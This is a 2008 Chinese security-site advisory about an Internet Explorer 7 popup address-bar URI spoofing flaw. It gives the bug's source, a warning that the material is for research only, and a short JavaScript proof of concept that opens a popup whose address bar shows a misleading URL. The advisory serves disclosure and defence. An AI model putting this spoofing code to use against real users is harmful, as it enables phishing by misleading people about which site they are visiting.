通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 新闻类 >> 最新公告 >> 漏洞公告 >> 文章正文
IE7弹出窗口地址栏URI欺骗漏洞
责任编辑:酷酷の鱼   更新日期:2008-4-10
 
受影响系统:

  Microsoft Internet Explorer 7.0

  描述

  BUGTRAQ ID: 28498

  Internet Explorer是微软发布的非常流行的WEB浏览器。

  如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。

  <*来源:Juan Pablo Lopez Yacubian (jplopezy@gmail.com)

  链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2

  *>

  测试方法

  警 告

  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<script language="JavaScript">
function iniciar()
{

nuevaventana = window.open("", "Win", "width=500,height=500,location=1");

nuevaventana.document.location = "
http://www.google.com.ar/#" +  "www.microsoft.com/";

}
iniciar()
</script>

  建议

  目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

  http://www.microsoft.com/windows/ie/default.asp

  • 上一篇文章:
  • 下一篇文章: 没有了
  • 最近更新
    推荐文章 瑞星公司04月10日发布 每日计算机病毒及木马播报
    普通文章 IE7弹出窗口地址栏URI欺骗漏洞
    普通文章 NSFOCUS 2008年03月之十大安全漏洞
    普通文章 木马1年窃财超10亿 网站登录呼唤安全标准
    普通文章 赛门铁克承认其产品存漏洞 可劫持用户PC
    普通文章 网游病毒又出新变种 窃取黄易群侠传信息
    普通文章 第一种iPhone特洛伊木马病毒出现
    普通文章 微软3月安全公告解决10漏洞
    普通文章 大学生反CNN网站被黑 创始人呼吁提供技术支援
    普通文章 实用技巧之用LoadRunner监控Linux方法
    热门文章
    普通文章虚拟服务器管理之道
    普通文章国家计算机病毒中心监测发现近期一些恶意木马程序活动
    普通文章近期木马肆虐 4月5日将收到蠕虫"礼物"
    普通文章火狐3.0第五测试版下周发布 最终版六月推出
    普通文章美国知名网站遭遇大规模攻击
    普通文章微软vs苹果:谁更快的为0day漏洞打补丁
    普通文章警告!18岁以下请勿使用Google
    普通文章Windows 2008曝严重漏洞 影响Vista
    普通文章VLC媒体播放器MP4_ReadBox_rdrf()函数堆溢出漏洞
    普通文章SILC 客户端以及服务器密钥协商远程整数溢出漏洞
    精彩专题